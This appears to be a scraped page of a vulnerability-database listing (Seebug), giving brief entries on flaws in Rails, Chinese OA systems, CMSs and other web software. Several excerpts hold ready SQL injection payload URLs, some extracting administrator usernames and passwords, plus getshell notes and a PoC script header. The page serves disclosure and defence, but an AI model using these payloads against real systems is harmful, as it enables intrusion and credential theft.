Seebug - Page 79 of Seebug Vulnerabilities List

seebug.org•added 2016/01/27 12:0 a.m.•38 views

Ruby on Rails rails-html-sanitizer XSS 漏洞

XSS vulnerability in rails-html-sanitizer There is a XSS vulnerability in Rails::Html::FullSanitizer used by Action View's striptags. This vulnerability has been assigned the CVE identifier CVE-2015-7579. Versions Affected: 1.0.2 Not affected: 1.0.0, 1.0.1 Fixed Versions: 1.0.3 Impact Due to the...

4.3CVSS5.9AI score0.02317EPSS

Exploits1

seebug.org•added 2016/01/27 12:0 a.m.•17 views

Ruby on Rails ActiveModel::Name远程拒绝服务漏洞

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•15 views

Ruby On Rails Paperclip跨站脚本漏洞

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•22 views

Object leak vulnerability for wildcard controller routes in Action Pack

Users that have a route that contains the string ":controller" are susceptible to objects being leaked globally which can lead to unbounded memory growth. To identify if your application is vulnerable, look for routes that contain ":controller". Internally, Action Pack keeps a map of "url...

6.8AI score

seebug.org•added 2016/01/27 12:0 a.m.•15 views

Ruby on Rails 'to_json'调用远程拒绝服务漏洞

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•62 views

wizBank®学习管理系统任意文件下载漏洞

wizBank学习管理系统文件下载功能没有对下载的文件名称和类型进行严格检查和过滤，恶意用户可通过构造特殊的路径下载指定的文件。 wizBank学习管理系统的\www\cw\skin1\jsp\download.jsp文件的源代码如下： code 区域，从代码可见，没有对下载的文件名称和类型进行严格检查和过滤，恶意用户可通过构造特殊的路径下载指定的文件。...

seebug.org•added 2016/01/27 12:0 a.m.•14 views

万户OA办公系统 informationmanager_download.jsp 任意文件下载漏洞

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•20 views

Shadows-IT Designs Local File Inclusion

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•22 views

Knoica Minolta FTP CWD命令缓冲区溢出漏洞

No description provided by source...

seebug.org•added 2016/01/27 12:0 a.m.•20 views

山东浪潮政务中心系统任意文件上传漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•57 views

用友致远A6协同系统messageViewer.jsp三处SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•22 views

齐博(qibocms) /blog/template/space/file/listbbs.php $TB_pre 参数SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•89 views

ZTE OLT C200 telnet 弱口令

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•64 views

TRS WCM parseXMLFile()函数 XXE漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•31 views

Huawei VRP telnet 弱口令

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•21 views

Shop7z order_checknoprint.asp id 参数 SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•26 views

Joomla com_docman 组件路径泄露和本地文件包含漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•31 views

FreeBSD 远程拒绝服务攻击漏洞

0x01 漏洞复现此漏洞是由于FreeBSD在处理ipv6数据包时，某函数对于数据的检验不严格，导致若传入的ipv6结构体某成员函数为NULL时，在后续函数调用中会触发assert，导致freebsd进入异常处理机制，内核崩溃引发系统重启，下面对此漏洞进行详细分析。首先对于漏洞环境的搭建我不讲解了，在我的微信公众号上发了一篇文章专门讲解FreeBSD环境的搭建，包括内核调试，vmtools安装等等，环境搭建好之后，通过执行poc.py，发现程序重启，重启过程中，/var/crash下会生成崩溃信息。...

7AI score

seebug.org•added 2016/01/26 12:0 a.m.•27 views

php168 知道模块 /zhidao/user.php?j=question&u SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•30 views

StrongSoft灾害预警系统 warn/AjaxHandle/AjaxOuterWarnForMerger.ashx DeptID参数SQL注入漏洞

注入链接：/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx 注入参数：DeptID 【获取数据库版本】 /warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=SELECT+@@version+AND+'EcwM'='EcwM 【获取当前数据库】...

seebug.org•added 2016/01/26 12:0 a.m.•59 views

phpwind V9.0 /windid/admin.php 验证码绕过漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•32 views

1caitong电子采购系统 Company_Show.aspx 参数ID SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•38 views

StrongSoft灾害预警系统 /Report/AjaxHandle/StationChoose/StationSearch.ashx stationName 参数SQL注入漏洞

注入链接：/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere= 注入参数：stationName 【获取数据库版本】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName='+and+1=2++union+all+select+@@version,NULL--&stationType='KKK'&sqlWhere=...

seebug.org•added 2016/01/26 12:0 a.m.•69 views

泛微E-Office /inc/priv_user_list/priv_xml.php SQL注入漏洞

0x01 框架概述泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验. 官方主页： www.weaver.com.cn 主页截图如下。 0x02 漏洞信息先对系统进行解密。 /inc/privuserlist/privxml.php 大概18行开始 $pararr = explodestpar $REQUEST'par' ; $userpriv = $pararr'userpriv'; ... if $pararr'viewtype' == 0 unset $deptnameutf8...

7AI score

seebug.org•added 2016/01/26 12:0 a.m.•16 views

金融化一卡通系统越权添加管理员

/managerNManager.action http://.../xykcx/managerNManager.action...

seebug.org•added 2016/01/26 12:0 a.m.•16 views

phpyun v4.0 api/locoy/model/news.class.php SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•21 views

StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞

注入链接：/Disaster/Reporting/ReportingDetail.aspx 注入参数：ID 【获取数据库版本】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR@@version -- 【管理员账号密码】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.WebSystemUser--...

seebug.org•added 2016/01/26 12:0 a.m.•20 views

用友u8 CmxItem.php SQL注入

No description provided by source...

seebug.org•added 2016/01/26 12:0 a.m.•20 views

StrongSoft灾害预警系统strFieldName参数SQL注入漏洞

注入链接：/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数：strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convertint,@@version 【管理员账号密码】...

seebug.org•added 2016/01/26 12:0 a.m.•17 views

Mao10CMS user_register.php 添加超级管理员逻辑漏洞

No description provided by source...

远古流媒体系统 query_user_password_qustion.aspx SQL 注入漏洞

/viewgood/webmedia/portal/queryuserpasswordqustion.aspx?username=1%27%20AND%201%3DCONVERT%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29%20AND%20%271%27%3D%271...

远古流媒体系统 pic_proxy.aspx SQL 注入漏洞

/viewgood/webmedia/portal/picproxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2...

seebug.org•added 2016/01/25 12:0 a.m.•90 views

远古流媒体系统 POST注入漏洞

username=%27%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%28%29%2bCHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29-- URL:http://xxx.com/VIEWGOOD/ADI/portal/UserDataSync.aspx POST:UserGUID=1' and...

seebug.org•added 2016/01/25 12:0 a.m.•17 views

乐知行教务系统 /datacenter/downloadApp/loadAppInfo.do versionType 参数SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•13 views

YouYaX saveself.html 储存型 xss

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•16 views

KingCMS V9 manage.php 任意用户密码重置漏洞

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•13 views

YouYaX宽字节盲注

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•24 views

HiShop商城系统 Isv.ashx 直接添加管理员设计缺陷

No description provided by source...

三星(Samsung) SyncThruWeb 2.01.00.26 - SMB散列泄露漏洞

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•18 views

Zfsoft OA系统 gwxxbviewhtml.do 任意文件下载漏洞

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•17 views

MoMoCMS_v3.1 install/index.php重装系统

MoMoCMSv3.1企业建站系统 Install/index.php里没有进行判断lock，你们能判断一下lock吗？在install/index.php $document.readyfunction / setup navigation, content boxes, etc... / // validate signup form on keyup and submit var validator = $"loginform".validate rules: dbhost: "required", dbname: "required", dbuser: "required",...

7AI score

Youyax lib/indexaction.php 二次注入

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•19 views

远古流媒体系统 GetCaption.ashx注入漏洞

/ADI/portal/GetCaption.ashx?CaptionType=1%27%20and%201%3Dconvert%28int%2C%28char%28116%29%252bchar%28121%29%252bchar%28113%29%252bdbname%28%29%252bCHAR%28116%29%252bCHAR%28121%29%252bCHAR%28113%29%29%29--&AssetID=1&CaptionName=11...

seebug.org•added 2016/01/25 12:0 a.m.•62 views

易企CMS install/install.php 代码执行

看代码\install\install.php 作用就是安装该cms，然后把install.php改为install.php.bak。由于apache解析问题，改文件还是会解析成php，然后就可以暴力getshell。数据库连接文件会写到\include\config.inc.php 由于是双引号可直接shell，无限制。...

seebug.org•added 2016/01/25 12:0 a.m.•26 views

StrongSoft灾害预警系统ContactUpdate.aspx ContactID参数SQL注入漏洞

注入链接：/Duty/MailList/ContactUpdate.aspx 注入参数：ContactID Payload：ContactID=-1+and+1=@@version...

seebug.org•added 2016/01/25 12:0 a.m.•18 views

Joomla! 组件 JE Guestbook v1.0 参数view SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/25 12:0 a.m.•34 views

泛微e-cology /web/careerapply/HrmCareerApplyAdd.jsp 文件 careerid 参数SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/23 12:0 a.m.•33 views

用友FE协作办公平台5.5 /common/treeXml.jsp 文件 code 参数SQL注入漏洞

No description provided by source...

seebug.org•added 2016/01/23 12:0 a.m.•19 views

shopnum1 GuidBuyList.aspx SQL注入漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import requests import re class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = '烽火戏诸侯' vulDate = ' 2015-06-09'...